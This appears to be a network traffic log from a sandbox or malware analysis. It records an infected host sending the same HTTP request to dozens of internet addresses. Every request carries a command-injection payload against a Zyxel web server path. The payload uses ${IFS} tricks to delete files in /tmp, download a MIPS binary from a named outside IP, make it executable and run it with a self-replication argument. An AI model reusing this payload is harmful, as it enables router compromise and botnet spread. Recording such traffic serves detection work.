                                                        Feb 2, 2024 06:21:19.112921000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6646192.168.2.1458712143.134.169.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112981081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6647192.168.2.1440250185.215.170.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113035917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6648192.168.2.1448162143.119.204.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113069057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6649192.168.2.143896025.7.205.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113114119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6650192.168.2.1456338111.216.68.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113143921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6651192.168.2.144911847.190.91.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113189936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6652192.168.2.1450804133.228.156.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113230944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6653192.168.2.1446030179.153.155.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113291979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6654192.168.2.1450606147.88.91.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113317966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6655192.168.2.144890047.167.74.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113363028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6656192.168.2.143785669.106.87.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113416910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6657192.168.2.14442902.132.143.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113442898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6658192.168.2.144219065.163.5.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113478899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6659192.168.2.145886639.126.77.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113538980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6660192.168.2.145923285.189.110.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113579988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6661192.168.2.1435178113.157.147.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113616943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6662192.168.2.1456392134.44.116.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113663912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6663192.168.2.1445716118.23.172.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113698959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6664192.168.2.1435190174.26.213.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113732100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6665192.168.2.1447468134.126.239.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113771915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6666192.168.2.1435606137.11.6.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113795996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6667192.168.2.1459720118.212.112.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113842964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6668192.168.2.1453340132.126.158.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113868952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6669192.168.2.1444412146.238.62.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113897085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6670192.168.2.1447146132.126.127.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113924026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6671192.168.2.1445780179.73.6.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.113969088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6672192.168.2.145244813.7.221.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114034891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6673192.168.2.1457364201.141.64.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114069939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6674192.168.2.1455188216.166.4.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114120007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6675192.168.2.1449768154.81.227.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114149094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6676192.168.2.1450570191.117.231.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114186049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6677192.168.2.144250871.116.26.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114207029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6678192.168.2.1439696223.33.45.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114257097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6679192.168.2.145350667.17.198.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114285946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6680192.168.2.1445894221.135.175.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114325047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6681192.168.2.145489686.234.163.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114360094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6682192.168.2.14498741.219.120.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114418983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6683192.168.2.145102838.157.209.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114455938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6684192.168.2.1460520104.236.76.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114511013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6685192.168.2.144024853.24.167.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114567041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6686192.168.2.144792880.154.134.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114608049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6687192.168.2.145128436.133.24.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114634037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6688192.168.2.1459838108.152.91.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114666939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6689192.168.2.1450458120.1.126.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114696026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6690192.168.2.1444438184.106.7.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114737034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6691192.168.2.1441378168.44.199.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114775896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6692192.168.2.144926237.240.59.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114825010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6693192.168.2.1454412119.157.233.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114885092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6694192.168.2.145110077.91.4.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114916086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6695192.168.2.144677658.245.8.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114959955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6696192.168.2.1443060102.160.219.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.114995003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6697192.168.2.143570280.124.56.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115030050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6698192.168.2.1451498199.125.15.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115072966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6699192.168.2.1436686143.231.130.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115098953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6700192.168.2.145701050.37.139.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115145922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6701192.168.2.1450510138.204.29.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115180969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6702192.168.2.1460620148.253.38.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115226030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6703192.168.2.1447418116.116.94.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115253925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6704192.168.2.143925840.120.21.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115298986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6705192.168.2.144933659.135.151.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115323067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6706192.168.2.143570034.11.2.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115367889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6707192.168.2.146004027.221.130.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115428925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6708192.168.2.144598827.47.9.218443
                                                        TimestampBytes transferredDirectionData
